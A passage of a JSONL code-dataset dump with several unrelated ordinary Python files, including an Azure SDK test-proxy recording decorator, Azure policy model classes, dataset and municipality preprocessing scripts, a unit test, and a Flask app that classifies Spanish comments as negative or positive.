ex: # would be a JSONDecodeError on Python 3, which subclasses ValueError\n six.raise_from(\n ValueError(\"The response body returned from starting playback did not contain valid JSON\"),\n ex,\n )\n\n # set recording ID in a module-level variable so that sanitizers can access it\n set_recording_id(test_id, recording_id)\n return (recording_id, variables)\n\n\ndef stop_record_or_playback(test_id: str, recording_id: str, test_variables: \"Dict[str, str]\") -> None:\n try:\n http_client = get_http_client()\n if is_live():\n http_client.request(\n method=\"POST\",\n url=RECORDING_STOP_URL,\n headers={\n \"x-recording-file\": test_id,\n \"x-recording-id\": recording_id,\n \"x-recording-save\": \"true\",\n \"Content-Type\": \"application/json\",\n },\n # tests don't record successfully unless test_variables is a dictionary\n body=json.dumps(test_variables).encode(\"utf-8\") if test_variables else \"{}\",\n )\n else:\n http_client.request(\n method=\"POST\",\n url=PLAYBACK_STOP_URL,\n headers={\"x-recording-id\": recording_id},\n )\n except HTTPError as e:\n raise HttpResponseError(\n \"The test proxy ran into an error while ending the session. Make sure any test variables you record have \"\n \"string values.\"\n ) from e\n\n\ndef get_proxy_netloc() -> \"Dict[str, str]\":\n parsed_result = url_parse.urlparse(PROXY_URL)\n return {\"scheme\": parsed_result.scheme, \"netloc\": parsed_result.netloc}\n\n\ndef transform_request(request: \"HttpRequest\", recording_id: str) -> None:\n \"\"\"Redirect the request to the test proxy, and store the original request URI in a header\"\"\"\n headers = request.headers\n\n parsed_result = url_parse.urlparse(request.url)\n updated_target = parsed_result._replace(**get_proxy_netloc()).geturl()\n if headers.get(\"x-recording-upstream-base-uri\", None) is None:\n headers[\"x-recording-upstream-base-uri\"] = \"{}://{}\".format(parsed_result.scheme, parsed_result.netloc)\n headers[\"x-recording-id\"] = recording_id\n headers[\"x-recording-mode\"] = \"record\" if is_live() else \"playback\"\n request.url = updated_target\n\n\ndef recorded_by_proxy(test_func: \"Callable\") -> None:\n \"\"\"Decorator that redirects network requests to target the azure-sdk-tools test proxy. 
Use with recorded tests.\n\n For more details and usage examples, refer to\n https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/test_proxy_migration_guide.md\n \"\"\"\n\n def record_wrap(*args, **kwargs):\n def transform_args(*args, **kwargs):\n copied_positional_args = list(args)\n request = copied_positional_args[1]\n\n transform_request(request, recording_id)\n\n return tuple(copied_positional_args), kwargs\n\n trimmed_kwargs = {k: v for k, v in kwargs.items()}\n trim_kwargs_from_test_function(test_func, trimmed_kwargs)\n\n if is_live_and_not_recording():\n return test_func(*args, **trimmed_kwargs)\n\n test_id = get_test_id()\n recording_id, variables = start_record_or_playback(test_id)\n original_transport_func = RequestsTransport.send\n\n def combined_call(*args, **kwargs):\n adjusted_args, adjusted_kwargs = transform_args(*args, **kwargs)\n result = original_transport_func(*adjusted_args, **adjusted_kwargs)\n\n # make the x-recording-upstream-base-uri the URL of the request\n # this makes the request look like it was made to the original endpoint instead of to the proxy\n # without this, things like LROPollers can get broken by polling the wrong endpoint\n parsed_result = url_parse.urlparse(result.request.url)\n upstream_uri = url_parse.urlparse(result.request.headers[\"x-recording-upstream-base-uri\"])\n upstream_uri_dict = {\n \"scheme\": upstream_uri.scheme,\n \"netloc\": upstream_uri.netloc,\n }\n original_target = parsed_result._replace(**upstream_uri_dict).geturl()\n\n result.request.url = original_target\n return result\n\n RequestsTransport.send = combined_call\n\n # call the modified function\n # we define test_variables before invoking the test so the variable is defined in case of an exception\n test_variables = None\n # this tracks whether the test has been run yet; used when calling the test function with/without `variables`\n # running without `variables` in the `except` block leads to unnecessary exceptions in test execution output\n test_run = False\n try:\n try:\n test_variables = test_func(*args, variables=variables, **trimmed_kwargs)\n test_run = True\n except TypeError as error:\n if \"unexpected keyword argument\" in str(error) and \"variables\" in str(error):\n logger = logging.getLogger()\n logger.info(\n \"This test can't accept variables as input. 
The test method should accept `**kwargs` and/or a \"\n \"`variables` parameter to make use of recorded test variables.\"\n )\n else:\n raise error\n # if the test couldn't accept `variables`, run the test without passing them\n if not test_run:\n test_variables = test_func(*args, **trimmed_kwargs)\n\n except ResourceNotFoundError as error:\n error_body = ContentDecodePolicy.deserialize_from_http_generics(error.response)\n message = error_body.get(\"message\") or error_body.get(\"Message\")\n error_with_message = ResourceNotFoundError(message=message, response=error.response)\n six.raise_from(error_with_message, error)\n\n finally:\n RequestsTransport.send = original_transport_func\n stop_record_or_playback(test_id, recording_id, test_variables)\n\n return test_variables\n\n return record_wrap\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"tools/azure-sdk-tools/devtools_testutils/proxy_testcase.py","file_name":"proxy_testcase.py","file_ext":"py","file_size_in_byte":10348,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"5815324155","text":"## splitXY\n## Splits the original dataset as downloaded from Kaggle and renames the files\n## \n\nimport os\nimport glob\nimport shutil \n\nDATASET_DIR_NAME = 'S7-ISP-Dataset'\nNEW_DATASET_DIR_NAME = 'S7-ISP-Dataset-Sorted'\nBASE_PATH = os.getcwd()\nDATA_PATH = os.path.join(BASE_PATH,DATASET_DIR_NAME) # This should be the path to the S7 dataset as downloaded from Kaggle\nNEW_DATA_PATH = os.path.join(BASE_PATH,NEW_DATASET_DIR_NAME) # Split dataset will be saved here\nif not os.path.isdir(NEW_DATA_PATH): os.mkdir(NEW_DATA_PATH)\n\n########### Short exposure ##########\nNEW_DATASET_SHORT_EXPOSURE_PATH = os.path.join(NEW_DATA_PATH,'S7-ISP-Short-Exposure')\nif not os.path.isdir(NEW_DATASET_SHORT_EXPOSURE_PATH): os.mkdir(NEW_DATASET_SHORT_EXPOSURE_PATH)\nNEW_PATH_X = os.path.join(NEW_DATASET_SHORT_EXPOSURE_PATH,'X')\nif not os.path.isdir(NEW_PATH_X): os.mkdir(NEW_PATH_X)\nNEW_PATH_Y = os.path.join(NEW_DATASET_SHORT_EXPOSURE_PATH,'Y')\nif not os.path.isdir(NEW_PATH_Y): os.mkdir(NEW_PATH_Y)\n######### Medium exposure ##########\n# Not needed for now\n\n# Loop through each folder inside the top folder of the dataset as downloaded from Kaggle\n# Put each short exposure dng in NEW_PATH_X and each medium exposure (ground truth) in NEW_PATH_Y\n# The name of each image is changed to the name of the folder it belonged to. This way the names completeley match\nfor dirname in os.listdir(DATA_PATH):\n DNGs = glob.glob(DATA_PATH+\"/\"+dirname+\"/\"+\"*.dng\") #list of full paths to dng\n JPGs = glob.glob(DATA_PATH+\"/\"+dirname+\"/\"+\"*.jpg\") #list of full paths to jpg\n for dng_path, jpg_path in zip(DNGs,JPGs):\n dng_name = dng_path.split('/')[-1]\n jpg_name = jpg_path.split('/')[-1]\n if dng_name.split('_')[0] == 'short':\n shutil.copy(dng_path, os.path.join(NEW_PATH_X,dirname+'.dng'))\n if jpg_name.split('_')[0] == 'medium':\n shutil.copy(jpg_path, os.path.join(NEW_PATH_Y,dirname+'.jpg')) \n\n","repo_name":"alexanderhankin/Deep_Learning-based_ISP_ee193-03_project","sub_path":"DeepISP/src/splitXY.py","file_name":"splitXY.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3605029042","text":"import sys\nfrom typing import Any, List, Optional, TYPE_CHECKING, Union\n\nfrom ... 
import _serialization\n\nif sys.version_info >= (3, 9):\n from collections.abc import MutableMapping\nelse:\n from typing import MutableMapping # type: ignore # pylint: disable=ungrouped-imports\n\nif TYPE_CHECKING:\n # pylint: disable=unused-import,ungrouped-imports\n from .. import models as _models\nJSON = MutableMapping[str, Any] # pylint: disable=unsubscriptable-object\n\n\nclass PolicyAssignment(_serialization.Model):\n \"\"\"The policy assignment.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar id: The ID of the policy assignment.\n :vartype id: str\n :ivar type: The type of the policy assignment.\n :vartype type: str\n :ivar name: The name of the policy assignment.\n :vartype name: str\n :ivar display_name: The display name of the policy assignment.\n :vartype display_name: str\n :ivar policy_definition_id: The ID of the policy definition.\n :vartype policy_definition_id: str\n :ivar scope: The scope for the policy assignment.\n :vartype scope: str\n :ivar parameters: Required if a parameter is used in policy rule.\n :vartype parameters: JSON\n :ivar description: This message will be part of response in case of policy violation.\n :vartype description: str\n \"\"\"\n\n _validation = {\n \"id\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"id\": {\"key\": \"id\", \"type\": \"str\"},\n \"type\": {\"key\": \"type\", \"type\": \"str\"},\n \"name\": {\"key\": \"name\", \"type\": \"str\"},\n \"display_name\": {\"key\": \"properties.displayName\", \"type\": \"str\"},\n \"policy_definition_id\": {\"key\": \"properties.policyDefinitionId\", \"type\": \"str\"},\n \"scope\": {\"key\": \"properties.scope\", \"type\": \"str\"},\n \"parameters\": {\"key\": \"properties.parameters\", \"type\": \"object\"},\n \"description\": {\"key\": \"properties.description\", \"type\": \"str\"},\n }\n\n def __init__(\n self,\n *,\n type: Optional[str] = None,\n name: Optional[str] = None,\n display_name: Optional[str] = None,\n policy_definition_id: Optional[str] = None,\n scope: Optional[str] = None,\n parameters: Optional[JSON] = None,\n description: Optional[str] = None,\n **kwargs: Any\n ) -> None:\n \"\"\"\n :keyword type: The type of the policy assignment.\n :paramtype type: str\n :keyword name: The name of the policy assignment.\n :paramtype name: str\n :keyword display_name: The display name of the policy assignment.\n :paramtype display_name: str\n :keyword policy_definition_id: The ID of the policy definition.\n :paramtype policy_definition_id: str\n :keyword scope: The scope for the policy assignment.\n :paramtype scope: str\n :keyword parameters: Required if a parameter is used in policy rule.\n :paramtype parameters: JSON\n :keyword description: This message will be part of response in case of policy violation.\n :paramtype description: str\n \"\"\"\n super().__init__(**kwargs)\n self.id = None\n self.type = type\n self.name = name\n self.display_name = display_name\n self.policy_definition_id = policy_definition_id\n self.scope = scope\n self.parameters = parameters\n self.description = description\n\n\nclass PolicyAssignmentListResult(_serialization.Model):\n \"\"\"List of policy assignments.\n\n :ivar value: An array of policy assignments.\n :vartype value: list[~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment]\n :ivar next_link: The URL to use for getting the next set of results.\n :vartype next_link: str\n \"\"\"\n\n _attribute_map = {\n \"value\": {\"key\": \"value\", \"type\": \"[PolicyAssignment]\"},\n 
\"next_link\": {\"key\": \"nextLink\", \"type\": \"str\"},\n }\n\n def __init__(\n self,\n *,\n value: Optional[List[\"_models.PolicyAssignment\"]] = None,\n next_link: Optional[str] = None,\n **kwargs: Any\n ) -> None:\n \"\"\"\n :keyword value: An array of policy assignments.\n :paramtype value: list[~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment]\n :keyword next_link: The URL to use for getting the next set of results.\n :paramtype next_link: str\n \"\"\"\n super().__init__(**kwargs)\n self.value = value\n self.next_link = next_link\n\n\nclass PolicyDefinition(_serialization.Model):\n \"\"\"The policy definition.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar id: The ID of the policy definition.\n :vartype id: str\n :ivar name: The name of the policy definition.\n :vartype name: str\n :ivar policy_type: The type of policy definition. Possible values are NotSpecified, BuiltIn,\n and Custom. Known values are: \"NotSpecified\", \"BuiltIn\", and \"Custom\".\n :vartype policy_type: str or ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyType\n :ivar mode: The policy definition mode. Possible values are NotSpecified, Indexed, and All.\n Known values are: \"NotSpecified\", \"Indexed\", and \"All\".\n :vartype mode: str or ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyMode\n :ivar display_name: The display name of the policy definition.\n :vartype display_name: str\n :ivar description: The policy definition description.\n :vartype description: str\n :ivar policy_rule: The policy rule.\n :vartype policy_rule: JSON\n :ivar metadata: The policy definition metadata.\n :vartype metadata: JSON\n :ivar parameters: Required if a parameter is used in policy rule.\n :vartype parameters: JSON\n \"\"\"\n\n _validation = {\n \"id\": {\"readonly\": True},\n \"name\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"id\": {\"key\": \"id\", \"type\": \"str\"},\n \"name\": {\"key\": \"name\", \"type\": \"str\"},\n \"policy_type\": {\"key\": \"properties.policyType\", \"type\": \"str\"},\n \"mode\": {\"key\": \"properties.mode\", \"type\": \"str\"},\n \"display_name\": {\"key\": \"properties.displayName\", \"type\": \"str\"},\n \"description\": {\"key\": \"properties.description\", \"type\": \"str\"},\n \"policy_rule\": {\"key\": \"properties.policyRule\", \"type\": \"object\"},\n \"metadata\": {\"key\": \"properties.metadata\", \"type\": \"object\"},\n \"parameters\": {\"key\": \"properties.parameters\", \"type\": \"object\"},\n }\n\n def __init__(\n self,\n *,\n policy_type: Optional[Union[str, \"_models.PolicyType\"]] = None,\n mode: Optional[Union[str, \"_models.PolicyMode\"]] = None,\n display_name: Optional[str] = None,\n description: Optional[str] = None,\n policy_rule: Optional[JSON] = None,\n metadata: Optional[JSON] = None,\n parameters: Optional[JSON] = None,\n **kwargs: Any\n ) -> None:\n \"\"\"\n :keyword policy_type: The type of policy definition. Possible values are NotSpecified, BuiltIn,\n and Custom. Known values are: \"NotSpecified\", \"BuiltIn\", and \"Custom\".\n :paramtype policy_type: str or ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyType\n :keyword mode: The policy definition mode. 
Possible values are NotSpecified, Indexed, and All.\n Known values are: \"NotSpecified\", \"Indexed\", and \"All\".\n :paramtype mode: str or ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyMode\n :keyword display_name: The display name of the policy definition.\n :paramtype display_name: str\n :keyword description: The policy definition description.\n :paramtype description: str\n :keyword policy_rule: The policy rule.\n :paramtype policy_rule: JSON\n :keyword metadata: The policy definition metadata.\n :paramtype metadata: JSON\n :keyword parameters: Required if a parameter is used in policy rule.\n :paramtype parameters: JSON\n \"\"\"\n super().__init__(**kwargs)\n self.id = None\n self.name = None\n self.policy_type = policy_type\n self.mode = mode\n self.display_name = display_name\n self.description = description\n self.policy_rule = policy_rule\n self.metadata = metadata\n self.parameters = parameters\n\n\nclass PolicyDefinitionListResult(_serialization.Model):\n \"\"\"List of policy definitions.\n\n :ivar value: An array of policy definitions.\n :vartype value: list[~azure.mgmt.resource.policy.v2016_12_01.models.PolicyDefinition]\n :ivar next_link: The URL to use for getting the next set of results.\n :vartype next_link: str\n \"\"\"\n\n _attribute_map = {\n \"value\": {\"key\": \"value\", \"type\": \"[PolicyDefinition]\"},\n \"next_link\": {\"key\": \"nextLink\", \"type\": \"str\"},\n }\n\n def __init__(\n self,\n *,\n value: Optional[List[\"_models.PolicyDefinition\"]] = None,\n next_link: Optional[str] = None,\n **kwargs: Any\n ) -> None:\n \"\"\"\n :keyword value: An array of policy definitions.\n :paramtype value: list[~azure.mgmt.resource.policy.v2016_12_01.models.PolicyDefinition]\n :keyword next_link: The URL to use for getting the next set of results.\n :paramtype next_link: str\n \"\"\"\n super().__init__(**kwargs)\n self.value = value\n self.next_link = next_link\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/resources/azure-mgmt-resource/azure/mgmt/resource/policy/v2016_12_01/models/_models_py3.py","file_name":"_models_py3.py","file_ext":"py","file_size_in_byte":9358,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"15264024354","text":"#! 
/usr/bin/env python\n#coding=utf-8\n\n'''\n本模块实现从原始数据转换成'dataproc'模块所需格式数据的功能。\n同时,也提供了原始数据完整性和正确性的检查(注:此功能暂未完全实现)。\n'''\n\n__author__ = 'hstaos@gmail.com (Huang Shitao)'\n\n\nimport logging\n\n\nclass DataAccess:\n\n def __init__(self, _raw):\n if 0 > check(_raw):\n logging.warning(\"The raw data is bad.\")\n raise ValueError(\"The raw data is bad.\")\n self.raw = _raw\n\n def get_level_data(self):\n data = []\n for _level in self.raw[\"_def\"][\"_level\"]:\n data.append((_level[\"_id\"], _level[\"_pid\"]))\n return data\n\n def get_evals(self):\n data = []\n for _eval in self.raw[\"_res\"][\"_eval\"]:\n data.append((_eval[\"_level_id\"], _eval[\"_class_id\"]))\n return data\n\n def get_classes(self):\n data = []\n for _class in self.raw[\"_def\"][\"_class\"]:\n data.append((_class[\"_id\"], _class[\"_value\"]))\n return data\n\n def get_weight_result(self):\n data = []\n for _weight in self.raw[\"_res\"][\"_weight\"]:\n data.append((_weight[\"_level_id1\"], _weight[\"_level_id2\"], _weight[\"_value\"]))\n return data\n\n\ndef check(raw):\n '''检查原始数据的正确性和完整性'''\n if raw is None:\n return -1\n try:\n if None == raw[\"_def\"][\"_level\"]:\n return -1\n if None == raw[\"_def\"][\"_class\"]:\n return -1\n if None == raw[\"_res\"][\"_eval\"]:\n return -1\n if None == raw[\"_res\"][\"_weight\"]:\n return -1\n except:\n return -1\n return 0\n","repo_name":"hstaos/fuzzy-risk-evaluation-server","sub_path":"bin/dataaccess.py","file_name":"dataaccess.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"7687262813","text":"# -*- coding: utf-8 -*-\n# @Time : 2/11/23 4:07 PM\n# @FileName: forget.py\n# @Software: PyCharm\n# @Github :sudoskys\nimport math\n\n\n# 稳定性\ndef forget(sim, hour, rank=0.5):\n S = sim * rank\n # 一天的时间\n R = math.exp(hour * math.log(0.9) / S)\n return R\n\n\nprint(forget(sim=0.5, hour=0.01) * 100)\n","repo_name":"aiastia-bak/llm-kira","sub_path":"lab/forget.py","file_name":"forget.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"10373373077","text":"# TestTreeVQ.py\nimport unittest\nimport TreeVQ\nfrom Vector import Vector\n\nclass TestTreeVQ(unittest.TestCase):\n def testQuantise_oneElement(self):\n N1 = TreeVQ.VQNode(None, None, Vector([1,0,0,0]))\n t = TreeVQ.TreeVQ(N1)\n\n self.failUnlessEqual(t.quantise(Vector([0,0,0,0])), Vector([1,0,0,0]), \"Quantiser did not return correct element\")\n\n def testQuantise_threeElements(self):\n N3 = TreeVQ.VQNode(None, None, Vector([-1,0,0,0]))\n N2 = TreeVQ.VQNode(None, None, Vector([ 1,0,0,0]))\n N1 = TreeVQ.VQNode(N2 , N3 , Vector([ 0,0,0,0]))\n t = TreeVQ.TreeVQ(N1)\n\n self.failUnlessEqual(t.quantise(Vector([ 0.1,0,0,0])), Vector([ 1,0,0,0]), \"Quantiser did not return correct element\")\n self.failUnlessEqual(t.quantise(Vector([-0.1,0,0,0])), Vector([-1,0,0,0]), \"Quantiser did not return correct element\")\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"milesvp/pokerbot","sub_path":"TreeVQ/TestTreeVQ.py","file_name":"TestTreeVQ.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13737656609","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 27 09:39:36 2023\n\n@author: drago\n\"\"\"\n\nimport json\nimport pandas as pd\nimport os\n\nos.chdir('C:/Users/drago/Downloads/APTI-HGA/proyecto/baseDatos')\ndictionary = 
{}\ncount = 0\nentidad_tmp = \"\"\ninicio = 0\n\nmunicipios = pd.DataFrame()\n\nmunicipios = pd.read_csv(\"Municipios.csv\")\nentidad_texto = municipios[['entidad', 'municipio']]\n# municipios_texto = municipios['municipio']\n# entidad_texto = [str(x) for x in entidad_texto]\n# municipios_texto = [str(x) for x in municipios_texto]\n# entidad_texto = [x.lower() for x in entidad_texto]\n# municipios_texto = [x.lower() for x in municipios_texto]\n# print(\"MUNICIPIOS\")\n# print(municipios)\n# print(\"\\n\")\n\nlista_entidad = [x.lower() for x in list(entidad_texto['entidad'])]\nlista_municipio = [x.lower() for x in list(entidad_texto['municipio'])]\n\n# print(lista_entidad)\n# print(len(lista_entidad))\n\nfor i in range(len(lista_entidad)):\n # Definición de diccionario\n if lista_entidad[i] not in dictionary.keys():\n dictionary[lista_entidad[i]] = [lista_municipio[i]]\n else:\n dictionary[lista_entidad[i]].append(lista_municipio[i])\n\nprint(\"DICCIONARIO: \")\nprint(dictionary)\n \ntf = open(\"../municipios.json\", \"w\")\njson.dump(dictionary, tf)\ntf.close()","repo_name":"BattiestWinter/APTI-HGA","sub_path":"proyecto/municipios.py","file_name":"municipios.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16045192342","text":"import os\nimport json\nimport csv\n\n# Se importa Flask y otras funciones necesarias\n# para crear una aplicación web.\nfrom flask import Flask, request, jsonify\n\n# Se importa la función de pipeline de la biblioteca de\n# procesamiento de lenguaje natural \"transformers\".\nfrom transformers import pipeline\n\n# Este módulo proporciona acceso a la plataforma de almacenamiento de\n# Google Cloud, que permite almacenar y acceder a archivos en la nube.\nfrom google.cloud import storage\n\ngClassifier = None\n\n# Se definen las etiquetas candidatas para la clasificación.\ngCandidateLabels = [\"insulto\", \"enojado\", \"negativo\", \"queja\"]\n\n# Se define una plantilla de hipótesis para utilizar\n# con el clasificador.\ngHypothesysTemplate = \"Esta reseña es {}.\" \n\n# Máxima calificación a ser otenida por una\n# evaluación de reseña.\ngMaxScore = 0.4\n\n# Lista de los meses del año en español.\ngMonths = [\n \"enero\",\n \"febrero\",\n \"marzo\",\n \"abril\",\n \"mayo\",\n \"junio\",\n \"julio\",\n \"agosto\",\n \"septiembre\",\n \"octubre\",\n \"noviembre\",\n \"diciembre\"\n]\n\n# Nombre del bucket de Google Cloud Storage donde se encuentran los archivos.\ngCLOUD_BUCKET = 'bucket-analitica-qa'\n\n# Nombre del archivo JSON en el bucket.\ngCLOUD_BLOB_JSON : str = 'data_json/comentarios-youtube.json'\n\n# Nombre del archivo CSV que se guardará en el bucket.\ngCLOUD_BLOB_CSV : str = 'data_csv/comentarios-youtube.csv'\n\n# Se obtiene el valor del puerto a utilizar para la aplicación\n# web desde una variable de entorno.\ngPORT = os.getenv('PORT', default = None)\nprint(\"PORT:\", gPORT)\n\n# Se crea una instancia de Flask y se asigna a la\n# variable \"app\" como aplicación web.\napp = Flask(__name__)\n\n# Se define una función para verificar si una lista de texto\n# de entrada cuales son reseñas negativas por el clasificador.\ndef verify_list(iList: list[str], iClassifier, iMinValue: float) -> list[bool]:\n # Se ejecuta el clasificador con el texto de entrada.\n vResult = iClassifier(\n iList,\n candidate_labels = gCandidateLabels,\n hypothesis_template = gHypothesysTemplate\n )\n \n # Se verifica si las puntuaciones obtenidas por el clasificador\n # es mayor al 
valor mínimo especificado.\n vResult = list(map(\n lambda x:\n True if max(x[\"scores\"]) > iMinValue else False,\n vResult\n ))\n return vResult\n\n# Se define una función para verificar si el texto de entrada\n# es considerado negativo por el clasificador.\ndef verify_text(iInputText: str, iClassifier, iMinValue: float) -> bool:\n\n # Si el texto es vacío o nulo, se devuelve False.\n if (not iInputText) or len(iInputText) == 0:\n return False\n \n # Se ejecuta el clasificador con el texto de entrada.\n vResult = iClassifier(\n iInputText,\n candidate_labels = gCandidateLabels,\n hypothesis_template = gHypothesysTemplate\n )\n \n # Se verifica si alguna de las puntuaciones obtenidas por\n # el clasificador es mayor al valor mínimo especificado.\n return max(vResult['scores']) > iMinValue\n\n# Obtiene los datos en formato JSON desde el bucket de Google Cloud Storage.\ndef get_json():\n # Crea un cliente(conexión) de Google Cloud Storage\n vClient = storage.Client()\n \n # Obtiene conexión al bucket.\n vBucket = vClient.get_bucket(gCLOUD_BUCKET)\n \n # Obtiene el blob (archivo) del bucket.\n vBlob = vBucket.get_blob(gCLOUD_BLOB_JSON)\n \n # Descarga el blob(archivo) JSON en una cadena de texto.\n vJSON_Data = vBlob.download_as_string()\n \n # Convierte la cadena de texto JSON en un diccionario Python.\n vJSON_Data = json.loads(vJSON_Data)\n return vJSON_Data\n\n# Esta función recibe una lista de diccionarios y escribe cada uno de ellos en un archivo CSV.\ndef write_csv(iJsonData : list[ dict[ str, any ] ], iMin : int, iMax : int) -> str:\n # Genera el nombre archivo del archivo con formato \"datos-000000-000000.csv\".\n vFileName : str = f\"datos-{iMin:06d}-{iMax:06d}.csv\"\n # Abre el archivo CSV en modo escritura\n with open(vFileName, 'w', encoding = 'UTF-8', newline='') as vFile:\n # Especifica los nombres de las columnas\n vFieldNames = [\n 'valoracion',\n 'comentario',\n 'fecha',\n 'valoracion_number',\n 'score',\n 'day',\n 'month',\n 'month_string',\n 'year',\n 'date_review',\n 'prediction'\n ]\n # Crea un objeto DictWriter para escribir el archivo CSV.\n vWriter = csv.DictWriter(vFile, fieldnames = vFieldNames)\n # Escribe la primera fila con los nombres de las columnas.\n vWriter.writeheader()\n # Escribe las filas restantes con los datos de cada diccionario.\n vWriter.writerows(iJsonData)\n return vFileName\n\n# Esta función sube el archivo CSV al bucket de Google Cloud Storage\ndef save_csv_in_bucket(iCsvFileName : str) -> None:\n # Crea un cliente de Google Cloud Storage.\n vClient = storage.Client()\n # Selecciona el bucket.\n vBucket = vClient.get_bucket(gCLOUD_BUCKET)\n # Crea un blob en el bucket.\n vBlob = vBucket.blob(gCLOUD_BLOB_CSV)\n # Abre el archivo CSV en modo lectura binaria.\n with open(iCsvFileName, 'rb') as vFile:\n # Sube el archivo al blob.\n vBlob.upload_from_file(vFile)\n\n# Esta función recibe un mes en forma de cadena de\n# texto y devuelve su número y nombre completo.\ndef get_month(iMonth: str) -> str:\n # Recorre la lista de meses\n for i, vM in enumerate(gMonths):\n # Si el mes está en la cadena de\n # texto, devuelve su índice y nombre.\n if vM in iMonth:\n return i, vM\n # Si no se ha encontrado el mes, devuelve -1 y None.\n return -1, None\n\n# Se define una ruta para la aplicación web que utiliza el\n# método GET.\n@app.route('/', methods = ['GET'])\ndef clasifica_texto():\n # Se carga el modelo machine learning para predecir la categoría\n # de una queja del call-center.\n # El modelo se basa en BERT y está preparado para procesar\n # texto en 
español.\n global gClassifier\n if gClassifier is None:\n gClassifier = pipeline(\"zero-shot-classification\", model = \"./local_model_pretrained\")\n \n # Se obtiene el texto a clasificar desde el parámetro \"text\" de la petición.\n vInputText = request.args.get(\"text\")\n \n # Se verifica si la reseña es negativa.\n vFlag = verify_text(\n vInputText,\n gClassifier,\n gMaxScore\n )\n \n # Se construye la respuesta JSON.\n vResult = {\n \"status\": \"OK\",\n \"response\": (\"reseña negativa\" if vFlag else \"reseña positiva\"),\n \"response-bool\": vFlag\n }\n \n # Convierte un diccionario Python a formato JSON.\n return jsonify(vResult)\n\n# Procesa los datos de un archivo guardado en un JSON y guarda\n# los resultados en un archivo CSV en un Bucket. \n@app.route('/process_json')\ndef process_json():\n # Se obtiene el texto a clasificar desde el parámetro \"text\" de la petición.\n vIndexMin = str(request.args.get(\"index_min\"))\n vIndexMax = str(request.args.get(\"index_max\"))\n \n # Se verifica que los valores de índices sean válidos.\n if vIndexMin is None \\\n or vIndexMax is None \\\n or int(vIndexMin) < 0 \\\n or int(vIndexMax) < 0:\n vResult = {\n \"status\": \"error\",\n \"error\": \"Invalid input index [\"+ vIndexMin + \", \" + vIndexMax + \"].\"\n }\n return jsonify(vResult)\n\n # Convierte los índices en datos númericos válidos.\n vIndexMin = int(vIndexMin)\n vIndexMax = int(vIndexMax)\n\n # Obtiene los datos del JSON dentro del rango de índices.\n vJSON_Data = get_json()[vIndexMin : vIndexMax]\n \n # Se carga el modelo machine learning para predecir la categoría\n # de una queja del call-center.\n # El modelo se basa en BERT y está preparado para procesar\n # texto en español.\n global gClassifier\n if gClassifier is None:\n gClassifier = pipeline(\"zero-shot-classification\", model = \"./local_model_pretrained\")\n \n # Obtiene una lista con las reseñas públicadas y obtiene su predicción.\n vResult = list(map(lambda x: x[\"comentario\"], vJSON_Data))\n vResult = verify_list(vResult, gClassifier, gMaxScore)\n \n # Recorre los datos del JSON y extrae información revelante.\n for i, vData in enumerate(vJSON_Data):\n # Añade un campo al diccionario con solamente el valor númerico de la reseña.\n vData[\"valoracion_number\"] = vData[\"valoracion\"][12]\n # Añade un campo al diccionario con el score, calculado como el valor de la valoración dividido entre 5.\n vData[\"score\"] = float(vData[\"valoracion\"][12])/5\n # Añade un campo al diccionario con el día extraído de la fecha.\n vData[\"day\"] = int(vData[\"fecha\"][0:2])\n # Añade dos campos al diccionario con el índice del mes y el nombre del mes extraídos de la fecha.\n vData[\"month\"], vData[\"month_string\"] = get_month(vData[\"fecha\"])\n # Añade un campo al diccionario con el año extraído de la fecha.\n vData[\"year\"] = int(vData[\"fecha\"][-4:len(vData[\"fecha\"])])\n # Convierte la fecha en formate DD/MM/YYYY\n vData[\"date_review\"] = f'{vData[\"day\"]:02d}/{vData[\"month\"]:02d}/{vData[\"year\"]:04d}'\n # Se asgina la predicción de la reseña del comentario.\n vData[\"prediction\"] = vResult[i]\n \n # Escribe los datos modificados en un archivo CSV y obtiene su nombre\n vCsvFileName = write_csv(vJSON_Data, vIndexMin, vIndexMax)\n \n # Guarda el archivo CSV en el bucket.\n save_csv_in_bucket(vCsvFileName)\n \n # Crea la respuesta JSON de la petición GET.\n vResult = {\n \"status\": \"ok\"\n }\n return jsonify(vResult)\n\n# Si este archivo es ejecutado directamente, se despliega un servidor de pruebas para 
